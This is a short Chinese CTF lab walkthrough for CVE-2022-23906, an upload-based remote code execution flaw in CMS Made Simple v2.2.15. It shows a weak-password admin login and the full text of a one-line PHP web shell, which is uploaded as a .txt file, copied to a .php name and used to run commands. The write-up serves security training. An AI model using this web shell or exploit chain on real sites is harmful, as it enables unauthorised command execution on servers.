春秋云境:CVE-2022-23906

春秋云境:CVE-2022-23906

文章合集春秋云境系列靶场记录(合集)

关注WX:【小白SEC】查看更多内容……


CMS Made Simple v2.2.15 RCE:CVE-2022-23906

在这里插入图片描述

漏洞介绍

CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。


解题步骤

  1. 访问后台登录URL,通过弱口令登录后台:admin/123456
    在这里插入图片描述

  2. 通过图中位置进行图片上传文本格式的shell文件,比如1.txt,内容为:

<?php
system($_GET[1]);
phpinfo();
?>

在这里插入图片描述

  1. 上传成功后,选中此文件,并点击上方的copy进行复制,复制的文件名为:testshell.php
    在这里插入图片描述
    在这里插入图片描述

  2. 访问上传后的testshell.php,并执行命令查看flag:
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值